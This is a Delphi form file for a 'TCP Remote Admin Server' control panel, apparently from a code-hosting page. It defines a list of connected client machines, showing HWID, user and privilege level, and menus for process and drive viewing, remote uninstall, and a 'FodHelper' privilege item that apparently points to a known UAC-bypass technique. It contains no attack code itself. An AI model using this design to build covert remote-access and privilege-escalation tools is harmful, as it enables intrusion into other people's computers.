-
Notifications
You must be signed in to change notification settings - Fork 2
Expand file tree
/
Copy pathUnit1.dfm
More file actions
113 lines (113 loc) · 2.49 KB
/
Copy pathUnit1.dfm
File metadata and controls
113 lines (113 loc) · 2.49 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
object Form1: TForm1
Left = 0
Top = 0
Caption = 'TCP Remote Admin Server'
ClientHeight = 400
ClientWidth = 784
Color = clBtnFace
Font.Charset = DEFAULT_CHARSET
Font.Color = clWindowText
Font.Height = -12
Font.Name = 'Segoe UI'
Font.Style = []
OnCreate = FormCreate
OnDestroy = FormDestroy
TextHeight = 15
object ListView1: TListView
Left = 0
Top = 0
Width = 784
Height = 400
Align = alClient
Columns = <
item
Caption = 'Address'
Width = 100
end
item
Caption = 'HWID'
Width = 100
end
item
Caption = 'Machine'
Width = 100
end
item
Caption = 'User'
Width = 100
end
item
Caption = 'Privs'
Width = 100
end
item
Caption = 'System'
Width = 100
end
item
Caption = 'CPU'
Width = 100
end
item
Caption = 'RAM'
Width = 100
end
item
Caption = 'Disk'
Width = 100
end>
HideSelection = False
MultiSelect = True
ReadOnly = True
RowSelect = True
PopupMenu = PopupMenu1
TabOrder = 0
ViewStyle = vsReport
end
object PopupMenu1: TPopupMenu
Left = 200
Top = 120
object PrivilegeManager1: TMenuItem
Caption = 'Privilege Management'
object FodHelper1: TMenuItem
Caption = 'FodHelper'
OnClick = FodHelper1Click
end
end
object SystemManagement1: TMenuItem
Caption = 'System Management'
object DriveViewer1: TMenuItem
Caption = 'Drive Viewer'
OnClick = GetDiskInfo1Click
end
object ProcessManager1: TMenuItem
Caption = 'Process Manager'
OnClick = GetRunningProcesses1Click
end
end
object ClientControl1: TMenuItem
Caption = 'Client Control'
object Restart1: TMenuItem
Caption = 'Restart'
OnClick = Restart1Click
end
object Close1: TMenuItem
Caption = 'Close'
OnClick = Close1Click
end
object Uninstall1: TMenuItem
Caption = 'Uninstall'
OnClick = Uninstall1Click
end
end
end
object IdTCPServer1: TIdTCPServer
Bindings = <>
DefaultPort = 0
OnConnect = IdTCPServer1Connect
OnDisconnect = IdTCPServer1Disconnect
OnExecute = IdTCPServer1Execute
Left = 320
Top = 120
end
end